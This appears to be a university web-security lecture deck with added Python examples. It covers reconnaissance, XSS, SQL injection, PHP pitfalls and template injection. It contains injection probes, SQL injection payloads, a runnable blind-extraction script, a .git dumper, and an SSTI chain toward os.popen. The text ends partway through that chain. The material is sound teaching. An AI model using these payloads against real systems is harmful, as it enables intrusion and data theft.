Slide 1

Computer Security at NTUST
Inndy <inndytw@gmail.com>
Web Security Exploits

Slide 2

Outline
• Bug and Vulnerability
• Common Types of Vulnerability in Web Apps
• Vulnerability Hunting
• Common Vulnerabilities
  • XSS
  • SQL Injection

Slide 3

Bug & Vulnerability

Slide 4

Bug: your application crashed.

Slide 5

Vulnerability: it's an exploitable bug.

Slide 6

Web Security

Slide 7

[Figure: web-hacking mind map (DNS, web server, web application, ...) with the web-layer attack classes XSS, XXE, SQL Injection and CSRF. Taken from a slide deck by Orange.]

Slide 8

System Security

Slide 9

[Figure: the same mind map, now including the system-layer attacks: Struts2 OGNL RCE, Rails YAML RCE, XSS, UXSS, Padding Oracle, XXE, DNS Hijacking, SQL Injection, ShellShock, FastCGI RCE, NPRE RCE, CSRF, Bit-Flipping Attack. Taken from a slide deck by Orange.]

Slide 10

Common Types of Vulnerability in Web Apps
• Logic error
  • Race condition, Missing Function Level Access Control
• Injection
  • SQL injection, XSS, XXE injection, command injection
• Memory corruption
  • unserialize() in PHP (case study)
• Denial of Service
  • Regex DoS (ReDoS), a logic bug that leads to an infinite loop

Slide 11

Vulnerability Hunting
• Whitebox test
  • Code review
• Blackbox test
  • Guess, and try to inject something into your input fields
• Graybox test
  • Whitebox + blackbox test, when you have part of the source code or another version of it

Slide 12

Whitebox Test
• How?
  • Read the f**king code
  • Read the f**king code
  • Read the f**king code
  • and so on

Slide 13

Whitebox Test: Essential Skills / Tools
• Can you read this language? Do you know it completely?
  • If not, learn it and master it
• Command-line tools or your favorite modern text editor
  • Some super cool utils: grep, awk, sed, find
  • A modern text editor, but not Notepad (without the ++)
    • Sublime Text, Visual Studio Code, Notepad++

Slide 14

Whitebox Test: Language Features
• What's wrong with this code?

    /* PHP */
    if(!strcmp($_POST['password'], "the secret password"))
    {
        echo "You are in!\n";
    }

    # shell script
    cd "/home/$USER/data" && zip backup.zip *

• PHP: strcmp() expects two strings. If the client sends password[]=x, $_POST['password'] is an array; strcmp() then emits a warning and returns NULL (PHP 5 and 7), and !NULL is true, so the check passes without the password. Reject non-string input and compare with === (or hash_equals()).
• Shell: the unquoted * is expanded by the shell into the directory's file names. A file whose name starts with - (created by anyone else who can write to that directory) is then parsed by zip as an option instead of a file name. Use ./* so every expanded name is an operand.

Slide 15

Whitebox Test: Language Features

Slide 16

Whitebox Test: Language Features

Slide 17

Whitebox Test: Language Features

Slide 18

Whitebox Test: Language Features

Slide 19

Whitebox Test: Language Features
• HITCON CTF: over there

Slide 20

Whitebox Test
• Use a regular expression to locate things that look dangerous:

    egrep '(system|fwrite|danger_func)\(.*\$\w+.*\)' -r .

• ack-grep is a good tool:

    ack --php '(new )?mysqli?_connect'

Slide 21

Regular Expressions
    ^ABC          line starts with ABC
    DEF$          line ends with DEF
    A+            one or more A
    A*            zero or more A
    A?            zero or one A
    (ABC|DEF)?    ABC, or DEF, or nothing
    \w            a letter, digit or underscore
    .             any character
    [i-k3-5OAQ]   one of i, j, k, 3, 4, 5, O, A, Q

Slide 22

Regular Expressions: (system|fwrite|danger_func)\(.*\$\w+.*\)
    (system|fwrite|danger_func)   one of system, fwrite, danger_func
    \(                            a literal ( character
    .*                            any string, any length
    \$                            a literal $ character
    \w+                           one or more of [A-Za-z0-9_] (a PHP variable name)
    .*                            any string, any length
    \)                            a literal ) character
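As an added example (my code, not from the slides), the same search done from Python so it can sit in a review script: the slide's egrep pattern and the ack pattern are applied line by line to a constructed PHP snippet. The sample source and the function names are my own.

```python
import re

# Constructed sample standing in for a PHP file under review (not code from
# the slides): two calls pass a request-controlled variable to a sink, one
# sink call is static, and one line connects to the database.
SAMPLE_PHP = r'''<?php
$cmd = $_GET['cmd'];
system("ls " . $cmd);
system("ls -al");
fwrite($fp, $_POST['data']);
$x = danger_func("static");
$db = mysqli_connect($host, $user, $pass);
'''

# The pattern from the slide: a sink name, '(', anything, a PHP variable, anything, ')'.
SINK_RE = re.compile(r'(system|fwrite|danger_func)\(.*\$\w+.*\)')
# The ack example from the slide: mysql_* or mysqli_* connection calls.
CONNECT_RE = re.compile(r'(new )?mysqli?_connect')


def find_matches(source, pattern):
    """Return (line_number, matched_text, line) for every line the pattern hits,
    i.e. what `egrep -n -r` prints, minus the file name."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        m = pattern.search(line)
        if m:
            hits.append((number, m.group(0), line.strip()))
    return hits


def find_sinks(source):
    """Dangerous functions called with a variable somewhere in the argument list."""
    return find_matches(source, SINK_RE)


if __name__ == "__main__":
    for number, text, line in find_sinks(SAMPLE_PHP):
        print(f"{number}: {line}    <- {text}")
```

Like egrep, this is line-based: a call split over several lines, or a tainted value that flows through an intermediate variable first, is missed, while the static danger_func("static") is correctly skipped. Treat the hits as a triage list, then read the surrounding code.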

Slide 23

Whitebox Test: PHP
• Keep an eye on code that uses these functions:
  • execute shell command: system(), exec(), passthru(), the backtick operator
  • SQL query: mysql_query(), mysqli::query(), PDO execute()
  • file upload: move_uploaded_file(), $_FILES
  • file inclusion: require, require_once, include, include_once
  • file operation: fopen(), unlink(), file(), copy(), rename()
  • session management: $_COOKIE, $_SESSION, session_start()

Slide 24

Whitebox Test: ASP.NET / .NET MVC
• Keep an eye on code that uses these:
  • execute shell command: Process.Start(), CreateProcess()
  • SQL query: CommandText
  • file upload: Request.Files, PostedFile
  • file operation: File.*, FileSystem.*
  • session management: Session

Slide 25

Blackbox Test
• Try to inject something into every possible input field:
  • HTTP headers
    • X-Forwarded-For
    • User-Agent
  • POST body
  • GET parameters
  • cookies

Slide 26

Blackbox Test
• What to inject?
  • q=security'bug (a lone quote, to provoke a SQL or syntax error)
  • q[]=security bug (an array where a string is expected)
  • q=' or (the start of a SQL boolean bypass)
  • q=; ls -al (a shell command separator)
  • q=<script>alert()</script> (the classic XSS probe)

Slide 27

Imagination and creativity are your power.

Slide 28

Whitebox vs. Blackbox
• Blackbox methods can quickly detect some vulnerabilities
  • SQL injection, command injection, whatever injection, XSS, etc.
  • Most of the OWASP Top 10 can be detected
  • But not good at logic bugs and crypto failures
• Whitebox methods can find every bug and vulnerability
  • Infinite time, infinite bugs
  • It's very hard to dig out vulnerabilities in a complex, huge system

Slide 29

Graybox Testing
• We read the code and try to inject something
• Sometimes we don't have the full source code, or only an older (leaked) version is available
• The OWASP Top 10 is easy to detect; find it first

Slide 30

Collecting Information

Slide 31

Collecting Information
• What are we interested in?
  • What technology stack does our target use?
  • Undocumented / unlisted URLs and APIs
  • Full path disclosure
  • Version control system directories that may leak source code
  • SSL certificate

Slide 32

Fingerprinting

Slide 33

Fingerprinting
• Figure out the technology stack your target is using:
  • Language
  • Framework
  • Version
  • OS
  • HTTP server

Slide 34

Fingerprinting: HTTP Response

    $ curl -I http://eyny.com/
    HTTP/1.1 302 Found
    X-Powered-By: PHP/5.2.17
    Location: http://www67.eyny.com/index.php
    Content-type: text/html
    Date: Wed, 12 Oct 2016 16:32:22 GMT
    Server: Apache/2.0.59

• A pretty old PHP version: the 5.2 branch reached end of life in January 2011, more than five years before this response was captured.

Slide 35

Fingerprinting: HTTP Response

    $ curl -I -k https://stu255.ntust.edu.tw/ntust_stu/stu.aspx
    HTTP/1.1 200 OK
    Date: Thu, 13 Oct 2016 03:10:11 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 1.1.4322
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 93

• Windows Server 2003 (IIS 6.0 shipped with it), .NET Framework 1.1 (X-AspNet-Version: 1.1.4322)
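An added example, not part of the slides: the two transcripts above, plus an assumed nginx/Rack-style response for contrast, parsed into a stack fingerprint. The header-to-product rules are standard facts (the PHP and ASP.NET X-Powered-By values, the X-AspNet-Version header, which Windows release each IIS version shipped with); the function names and the third transcript are mine.

```python
import re

# Constructed transcripts: the first two are copied from the `curl -I` output on
# the slides, the third is an assumed Rack/Rails-style response.
RESPONSES = {
    "php_apache": """HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.17
Location: http://www67.eyny.com/index.php
Content-type: text/html
Date: Wed, 12 Oct 2016 16:32:22 GMT
Server: Apache/2.0.59""",
    "aspnet_iis": """HTTP/1.1 200 OK
Date: Thu, 13 Oct 2016 03:10:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93""",
    "rails_guess": """HTTP/1.1 200 OK
Server: nginx/1.10.1
X-Runtime: 0.012345
Set-Cookie: _myapp_session=abc123; path=/; HttpOnly""",
}

# IIS version -> the Windows release it shipped with.
IIS_TO_WINDOWS = {
    "5.0": "Windows 2000", "5.1": "Windows XP", "6.0": "Windows Server 2003",
    "7.0": "Windows Server 2008", "7.5": "Windows Server 2008 R2",
    "8.0": "Windows Server 2012", "8.5": "Windows Server 2012 R2",
    "10.0": "Windows Server 2016 or later",
}


def parse_response_head(raw):
    """Split a `curl -I` transcript into (status_line, {lower-case name: [values]})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def fingerprint(raw):
    """Derive server, language, runtime and OS hints from the response headers."""
    status, h = parse_response_head(raw)
    fp = {"status": status}
    server = h.get("server", [""])[0]
    m = re.match(r"([^/\s]+)/?(\S*)", server)
    if m:
        fp["server"], fp["server_version"] = m.group(1), m.group(2)
    for powered in h.get("x-powered-by", []):
        m = re.match(r"PHP/(\S+)", powered)
        if m:
            fp["language"], fp["language_version"] = "PHP", m.group(1)
        elif powered.startswith("ASP.NET"):
            fp["language"] = "ASP.NET"
    if "x-aspnet-version" in h:
        fp["runtime"] = ".NET Framework " + h["x-aspnet-version"][0]
    if fp.get("server") == "Microsoft-IIS":
        fp["os"] = IIS_TO_WINDOWS.get(fp.get("server_version"), "Windows")
    cookies = " ".join(h.get("set-cookie", []))
    # Heuristic, not proof: Rack sets X-Runtime and Rails apps default to a *_session cookie.
    if "x-runtime" in h and re.search(r"\b_\w+_session=", cookies):
        fp["framework_hint"] = "Rack/Rails (X-Runtime + *_session cookie)"
    return fp


if __name__ == "__main__":
    for name, raw in RESPONSES.items():
        print(name, fingerprint(raw))
```

Headers are self-reported and easy to strip or fake, so confirm a fingerprint with a second signal (default error pages, session cookie names, framework-specific paths) before relying on it.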

Slide 36

Fingerprinting: PHP
• http://www.psc.ntu.edu.tw/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
  • The PHP logo "easter egg": a query string consisting only of this GUID makes PHP (before 5.5, with expose_php=On) return the PHP logo instead of the page
• X-Powered-By: PHP/.*

Slide 37

Fingerprinting: Rails

Slide 38

Path Disclosure
• http://whatever.com/robots.txt
  • Tells search engines not to index some paths
  • Sometimes it reveals where the admin panel or the config file is

Slide 39

Error Message / Full Path Disclosure
• Some websites show their error messages to the user
• It may leak some code and file paths, or even worse
• Google hacking: PDO::__construct, mysql
• Convert a normal GET parameter to an array by injecting [] (for example ?id[]=1): a function that expects a string then emits a warning that includes the full script path

Slide 40

Error Message / Full Path Disclosure

Slide 41

Error Message / Full Path Disclosure

Slide 42

SSL Certificate: How does it work?
• Asymmetric cryptography: a public key and a private key
  • Encrypt with the public key, decrypt with the private key
  • Sign with the private key, verify with the public key (the slide's "encrypt with the private key, decrypt with the public key" is the textbook-RSA picture; real signature schemes are separate operations with their own padding)
  • We call this signing
• Every certificate belongs to an asymmetric key pair (the public key is in the cert, the private key stays with the owner)
• You can use a cert's key to sign another cert
• Your computer has some built-in root certs; we call their owners CAs
• If you trust a CA, then you trust the certs signed by it (and by the intermediates it signed)

Slide 43

SSL Certificate: Inside a certificate
• The most important field is called the common name (CN)
• The X.509 v3 format supports the Subject Alternative Name (SAN) extension, which allows different domains in one cert
  • Modern browsers (Chrome since version 58) match the host name against the SAN list only; a cert with just a CN is no longer accepted for host-name validation

Slide 44

SSL Certificate

Slide 45

Version Control System
• Sometimes you open FileZilla and drag the entire folder to the server, including:
  • .svn
  • .git
• What does a git repository contain?
• A tool to download .git from an HTTP server:
  • https://github.com/denny0223/scrabble
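As an added example (my code, not the tool linked above), this is what a .git downloader has to do once it can fetch files: read HEAD, follow the ref to a commit, parse the commit's tree and every sub-tree, and inflate each blob. To run offline it first builds a tiny throw-away repository in a temporary directory with two assumed PHP files; a real tool fetches the same paths over HTTP (.git/HEAD, .git/refs/heads/master, .git/objects/xx/yyyy...).

```python
import hashlib
import os
import tempfile
import zlib

# Constructed file contents for the fake repository (assumed, not from the slides).
CONFIG_PHP = b"<?php $db_pass = 's3cret'; // committed by mistake\n"
DB_PHP = b"<?php function connect() { /* ... */ }\n"


def _store(gitdir, kind, body):
    """Write one loose object ('<kind> <size>\\0<body>', zlib-compressed) and return its SHA-1."""
    raw = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    sha = hashlib.sha1(raw).hexdigest()
    objdir = os.path.join(gitdir, "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def make_fake_git(root):
    """Build .git/ with HEAD -> refs/heads/master -> commit -> tree -> blobs, like a
    deployed checkout whose .git directory was uploaded along with the site."""
    gitdir = os.path.join(root, ".git")
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    db_blob = _store(gitdir, "blob", DB_PHP)
    inc_tree = _store(gitdir, "tree", b"100644 db.php\0" + bytes.fromhex(db_blob))
    cfg_blob = _store(gitdir, "blob", CONFIG_PHP)
    top_tree = _store(gitdir, "tree",
                      b"100644 config.php\0" + bytes.fromhex(cfg_blob)
                      + b"40000 inc\0" + bytes.fromhex(inc_tree))
    commit = _store(gitdir, "commit",
                    b"tree " + top_tree.encode()
                    + b"\nauthor Dev <dev@example.com> 0 +0000"
                    + b"\ncommitter Dev <dev@example.com> 0 +0000\n\ndeploy\n")
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as f:
        f.write(commit + "\n")
    return gitdir


# --- the downloader side: the walk a dumping tool does over HTTP, here against disk ---

def read_object(gitdir, sha):
    """Fetch and decode one loose object; returns (kind, body)."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    kind, size = header.split()
    if int(size) != len(body) or hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError("corrupt object " + sha)
    return kind.decode(), body


def parse_tree(body):
    """Tree entries are '<mode> <name>\\0' followed by a raw 20-byte SHA-1."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def dump_repo(gitdir):
    """Resolve HEAD to a commit, walk its tree and return {path: file bytes}."""
    with open(os.path.join(gitdir, "HEAD")) as f:
        head = f.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(gitdir, head[5:])) as f:
            commit_sha = f.read().strip()
    else:
        commit_sha = head  # a detached HEAD holds the SHA directly
    kind, body = read_object(gitdir, commit_sha)
    assert kind == "commit"
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()
    files = {}

    def walk(sha, prefix):
        for mode, name, child in parse_tree(read_object(gitdir, sha)[1]):
            if mode == "40000":  # sub-directory
                walk(child, prefix + name + "/")
            else:
                files[prefix + name] = read_object(gitdir, child)[1]

    walk(tree_sha, "")
    return files


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return dump_repo(make_fake_git(tmp))
```

Two things a real dump also needs: objects that git has packed (.git/objects/pack/*.pack with its .idx) are not loose files, and when directory listing is disabled the object names have to be discovered from HEAD, refs, packed-refs, logs and the index rather than by browsing. The hash check in read_object is what makes a partial or tampered download detectable.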

Slide 46

Common Vulnerabilities

Slide 47

XSS
• HTML injection / JavaScript injection
• Close the current attribute or tag and inject some script:

    <img src="http://imgur.com/{ID}.png">
    <p class="msg">{MESSAGE}</p>

• Two types:
  • Reflected XSS: the payload comes straight from the input fields
  • Stored XSS: the payload is stored on the server and served to other users

Slide 48

XSS
• How to defend?
  • Remove all HTML tags from user input
  • HTML entity encode
    • The encoding must match the context: a text node, a quoted attribute, a URL and a JavaScript string each need different treatment, and entity encoding alone does not stop a javascript: URL in an href or src
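Added example (mine, not from the slides) putting the two defences side by side on the slide's own templates. The payloads are constructed: one injects a tag into element text, one breaks out of the src attribute without using any < character, and one is a javascript: URL. Python's html.parser stands in for the browser to check what the resulting markup actually contains.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The two templates from the XSS slide: {ID} sits inside an attribute value,
# {MESSAGE} inside element text.
IMG_TMPL = '<img src="http://imgur.com/{ID}.png">'
MSG_TMPL = '<p class="msg">{MESSAGE}</p>'

# Constructed attacker inputs, one per context.
SCRIPT_PAYLOAD = '<script>alert(1)</script>'
ATTR_PAYLOAD = 'x" onerror="alert(1)'   # no '<' at all: tag stripping never sees it
URL_PAYLOAD = 'javascript:alert(1)'


def render_unsafe(template, **values):
    """Straight substitution, as in the slide's templates."""
    return template.format(**values)


def strip_tags(value):
    """The 'remove all HTML tags' defence: drops <...> and nothing else."""
    return re.sub(r'<[^>]*>', '', value)


def render_escaped(template, **values):
    """HTML-entity encode every value; quote=True also turns " and ' into
    entities, so the value cannot close a quoted attribute."""
    return template.format(**{k: html.escape(str(v), quote=True) for k, v in values.items()})


def safe_url(value, allowed_schemes=("http", "https")):
    """For href/src: entity encoding does not neutralise a javascript: URL, so
    allow-list the scheme first. Returns None for anything else."""
    if urlsplit(value).scheme.lower() not in allowed_schemes:
        return None
    return html.escape(value, quote=True)


class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.update(attrs)


def parse_markup(markup):
    """(tag names, {attribute: value}) as an HTML parser sees the final markup."""
    p = _Collector()
    p.feed(markup)
    p.close()
    return p.tags, p.attrs


def has_injected_handler(markup):
    """Did the input turn into an on* event-handler attribute?"""
    return any(name.startswith("on") for name in parse_markup(markup)[1])
```

Stripping tags blocks the <script> payload and nothing else; entity encoding with quote=True covers text and double-quoted attribute contexts; a URL-valued attribute additionally needs the scheme check, and data placed inside a <script> block needs JavaScript-string escaping, which none of these examples cover.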

Slide 49

XSS: Real case, limited-length XSS
• Real case in the AIS3 scoreboard, from a Korean BoB project lecturer
• Write-up linked from the original slide (link not preserved)

Slide 50

SQL Injection
• Concatenating input fields into the SQL statement without proper sanitization (prepared statements with bound parameters are the fix)

Slide 51

SQL Injection Exploits
• Query:

    SELECT * FROM users WHERE
        name = '{$USR}' AND password = '{$PWD}'

• Payload: ' or 2 <3#
• Result:

    SELECT * FROM users WHERE
        name = '' or 2 <3 #' AND password = 'asjdf'

• The # (a MySQL comment) discards the rest of the statement, and 2 < 3 is true for every row, so the WHERE clause matches every user.

Slide 52

SQL Injection Exploits: UNION SELECT
• Payload: ' UNION SELECT 1, 2, 3#
• Result:

    SELECT * FROM users WHERE
        name = '' UNION SELECT 1,2,3
        #' AND password = 'asjdf'

• The UNION appends attacker-chosen rows (constants, or columns from another table) to the result; the column count has to match the original SELECT.

Slide 53

SQL Injection Exploits
• Payload: ' UNION SELECT 1,2,'
• Result:

    SELECT * FROM users WHERE
        name = '' UNION SELECT 1,2,'' AND password = 'asjdf'

• No comment character needed: the payload's trailing quote pairs with the query's own closing quote, so the rest of the template becomes a harmless expression in the third column.

Slide 54

SQL Injection Exploits: Blind Injection
• Payload: ' OR ASCII(SUBSTR(name, 1, 1)) > 64 #
• Result:

    SELECT * FROM users WHERE
        name = '' OR ASCII(SUBSTR(name, 1, 1)) > 64
        #' AND password = 'asjdf'

• No data comes back, only whether the query matched; ask one yes/no question at a time and rebuild the value character by character.

Slide 55

SQL Injection Exploits: INSERT
• Query:

    INSERT INTO users (id, name, password, is_admin)
        VALUES (NULL, '{$USR}', '{$PWD}', 0);

• Payload: inndy', 'pass', 1) #
• Result:

    INSERT INTO users
        (id, name, password, is_admin)
        VALUES (NULL, 'inndy', 'pass', 1) #', 'xxx', 0);

• The payload closes the VALUES list early with is_admin = 1 and comments out the remainder.
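An added example that runs the payloads from the previous slides against an in-memory SQLite database (my code, not the course's). Two adaptations: SQLite uses -- rather than # for a comment and spells ASCII() as unicode(); the table is constructed to match the users(id, name, password, is_admin) schema implied by the INSERT slide. The blind extraction generalises the single ASCII(SUBSTR(name, 1, 1)) > 64 question into a binary search per character, which is what a tool like sqlmap automates.

```python
import sqlite3


def make_db():
    """Constructed users table matching the schema implied by the slides."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, is_admin INTEGER);
        INSERT INTO users (name, password, is_admin) VALUES ('admin', 'hunter2', 1), ('bob', 'pw', 0);
    """)
    return db


def login_vuln(db, usr, pwd):
    """The slide's pattern: input concatenated straight into the statement."""
    sql = f"SELECT name FROM users WHERE name = '{usr}' AND password = '{pwd}'"
    return [row[0] for row in db.execute(sql)]


def login_safe(db, usr, pwd):
    """Parameterised: the driver binds the values, so quotes are just data."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (usr, pwd))]


def register_vuln(db, usr, pwd):
    """The INSERT from the slide, equally concatenated."""
    db.execute(f"INSERT INTO users (id, name, password, is_admin) VALUES (NULL, '{usr}', '{pwd}', 0)")
    db.commit()


def is_admin(db, usr):
    row = db.execute("SELECT is_admin FROM users WHERE name = ?", (usr,)).fetchone()
    return bool(row and row[0])


def make_oracle(db):
    """Boolean oracle: does a login with this condition OR'ed in return any row?"""
    return lambda cond: bool(login_vuln(db, f"' OR ({cond})--", "x"))


def blind_extract(db, oracle, column="name", where="is_admin = 1", maxlen=32):
    """Recover one column value a character at a time, binary-searching each
    code point with a '>= N' question. SQLite spells ASCII() as unicode()."""
    out = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            probe = (f"unicode(substr((SELECT {column} FROM users WHERE {where} LIMIT 1),"
                     f" {pos}, 1)) >= {mid}")
            if oracle(probe):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # past the end of the value: unicode('') is NULL, every probe is false
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(login_vuln(db, "' OR 2 < 3--", "wrong"))            # every user
    print(login_vuln(db, "' UNION SELECT password FROM users--", "x"))
    print(blind_extract(db, make_oracle(db)))                 # 'admin', one bit at a time
    print(login_safe(db, "' OR 2 < 3--", "wrong"))            # []
```

login_safe is the fix: with placeholders the input is bound as a value, so every payload above simply fails to match a user. Each character of the blind extraction costs about seven requests, which is why blind injection is noisy in server logs and a natural thing to alert on.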

Slide 56

SQL Injection Exploits
• Demo: sqlmap advanced usage

Slide 57

SQL Injection Exploits
• Think one million times before exploiting a SQLi vulnerability in the wild
• Think about it: what if the SQL statement looks like the ones below?

    DELETE FROM article WHERE id = '{$ID}';
    UPDATE users SET nickname = '{$NICK}' WHERE id = '{$ID}';

Slide 58

SQL Injection Exploits
• Well, it's an UPDATE/DELETE statement: the same always-true condition that bypasses a login (' or 2 <3#) here deletes or rewrites every row in the table.

Slide 59

SQL Injection: A True Tragic Story
• Some day, on fb.com/groups/NTUhead...

Slide 60

SQL Injection: A True Tragic Story

Slide 61

SQL Injection: A True Tragic Story

Slide 62

SQL Injection Exploits
• Yet another true story
• About a MapleStory private server

Slide 63

Other Vulnerabilities / Misc

Slide 64

Bad Encoding

Slide 65

UTF-8: The bad char

Slide 66

Bad Encoding
• When you decode bytes to Unicode, an invalid byte sequence is converted to U+FFFD (the replacement character)
  • \xEF\xBF\xBD in UTF-8
• It may cause some trouble: the original bytes are gone, and different invalid inputs become the same string

Slide 67

OpenCTF: Misc / rand dumb
• https://gist.github.com/Inndy/…

    /* TL; DR */
    var x = generate_random_bytes(); // Buffer (hypothetical helper; typo "genearte" corrected)
    x = String.fromCharCode(x.length) + x; // String + Buffer = String: the Buffer is decoded as UTF-8
    var token = Base64.encode(x);
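Added example (mine, not the gist's code) reproducing the bug above in Python: raw random bytes pass through a UTF-8 decode before the token is built. Every byte that is not valid UTF-8 in context becomes U+FFFD, so different secrets produce the same token, and for one-byte secrets only 129 of the 256 possible values survive.

```python
import base64


def make_token_lossy(raw):
    """Mirrors the slide's JavaScript: String + Buffer coerces the Buffer through
    UTF-8 decoding, and every invalid sequence collapses to U+FFFD."""
    text = chr(len(raw)) + raw.decode("utf-8", errors="replace")
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def make_token_correct(raw):
    """Keep the bytes as bytes; the length prefix is one byte, not a code point."""
    return base64.b64encode(bytes([len(raw) & 0xFF]) + raw).decode("ascii")


def replacement_chars(token):
    """How many U+FFFD (EF BF BD) markers a token carries, i.e. how many random
    bytes were destroyed on the way in."""
    return base64.b64decode(token).decode("utf-8").count("\ufffd")


def distinct_single_byte_tokens(maker):
    """How many different tokens the 256 possible one-byte secrets yield:
    0x00-0x7F survive as themselves, 0x80-0xFF all become the one U+FFFD."""
    return len({maker(bytes([b])) for b in range(256)})


if __name__ == "__main__":
    print(make_token_lossy(b"\xff\xfe") == make_token_lossy(b"\xfe\xff"))  # True: collision
    print(distinct_single_byte_tokens(make_token_lossy), distinct_single_byte_tokens(make_token_correct))
```

The lossy token is also not decodable back to the secret, so any server-side check that re-derives it from the stored bytes fails for roughly half of all inputs; the fix is to base64 the bytes directly and never let them touch a text type.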

Slide 68

WTF PHP

Slide 69

WTF PHP: Equality
• md5('240610708') == md5('QNKCDZO')
  • Both digests start with 0e followed only by digits, so PHP treats them as numeric strings (0 × 10^n); == compares numeric strings as numbers, and the comparison is true although the hashes differ. Compare hashes with === or hash_equals().
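Added example, not from the slides: the comparison emulated in Python so the effect can be checked without a PHP interpreter. php_loose_eq follows PHP's rule that two numeric strings are compared numerically (still the case in PHP 8 for string-to-string comparison); the two md5 inputs are the ones on the slide.

```python
import hashlib
import hmac
import re

# PHP's notion of a numeric string: optional sign, decimal digits, optional
# fraction, optional exponent. (PHP also tolerates surrounding whitespace; omitted here.)
NUMERIC_RE = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a, b):
    """PHP '==' between two strings: if both are numeric strings they are
    compared as numbers, so '0e123' == '0e456' because both are 0 * 10^n."""
    if NUMERIC_RE.match(a) and NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a, b):
    """PHP '===' (or hash_equals()): same bytes, compared in constant time."""
    return hmac.compare_digest(a.encode(), b.encode())


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h):
    """A hex digest that PHP parses as a number: '0e' followed only by digits."""
    return re.fullmatch(r"0e\d+", h) is not None


if __name__ == "__main__":
    h1, h2 = md5_hex("240610708"), md5_hex("QNKCDZO")
    print(h1, h2)
    print("==", php_loose_eq(h1, h2), "===", php_strict_eq(h1, h2))
```

Roughly one in 256 random md5 digests has this 0e-plus-digits shape (the "0e" prefix is fixed, the remaining 30 hex characters must all be decimal), so an attacker who controls one side of a == comparison against a stored hash only needs to search for an input whose digest is magic.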

Slide 70

WTF PHP: unserialize
• Class::__wakeup
• Class::__destruct
  • Magic methods run on an attacker-supplied object graph, so any class in the code base with an interesting __wakeup or __destruct becomes a gadget
• unserialize sucks: use-after-free bugs in unserialize itself
• Never, ever unserialize something from an untrusted source
• Use JSON

Slide 71

WTF PHP: extract
• Default behavior is to overwrite all existing variables
• extract(...) on a row fetched from a query ($stmt ... query ... fetchColumn) is very common; a column name or a user-controlled key can then clobber variables such as the current user id or an admin flag

Slide 72

WTF PHP: password_hash
• password_hash("passw\0rd", PASSWORD_DEFAULT)
• Null-byte truncation while hashing the password: the bcrypt backend treats the input as a C string, so everything after the first NUL is ignored and "passw" verifies too (bcrypt also ignores anything after 72 bytes)

Slide 73

WTF PHP: argument type
• if (!strcmp($_GET['password'], "password")) echo "Pass";
  • Same bug as on slide 14: password[]= makes strcmp() return NULL, and !NULL is true

Slide 74

Server-Side Template Injection

Slide 75

SSTI
• It's the age of MVC
• Bug bounty: Jinja2 SSTI in Uber, reported by Orange
• Trendy in CTFs
  • SSCTF: FlagMan
  • SECUINSIDE: SBBS
  • HITCON CTF: SecurePost
• Sandbox mechanism in many template engines?
• Simple trick: [].__class__.__mro__[1].__subclasses__() (for a list, __mro__[1] is object, and object's subclasses are every class loaded in the interpreter)

Slide 76

SSTI
• Exploit: unpickle / unserialize in Python
• Exploit: write a file, then load it with config.from_pyfile (Flask executes that file as Python code)
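An added example (my code; it needs no template engine) showing why the trick on the slide works: it is plain Python object introspection, which the engine merely has to fail to block. Starting from an empty list, the walk reaches object, enumerates every loaded class, and picks one whose __init__ was defined in the os module; that function's globals then hand back os.popen and os.system without importing anything. Nothing is executed.

```python
import os  # imported so the walk below has something to find; Flask/Jinja2 apps always have it loaded


def object_subclasses():
    """The slide's trick: [].__class__.__mro__[1] is `object`, and
    object.__subclasses__() lists every class currently loaded."""
    return [].__class__.__mro__[1].__subclasses__()


def find_module_globals(module_name="os", needle="system"):
    """Walk the loaded classes for one whose __init__ is a Python function
    defined in `module_name`; its __globals__ is that module's namespace."""
    for cls in object_subclasses():
        init = getattr(cls, "__init__", None)
        g = getattr(init, "__globals__", None)
        if isinstance(g, dict) and g.get("__name__") == module_name and needle in g:
            return cls, g
    return None, None


def reach_popen():
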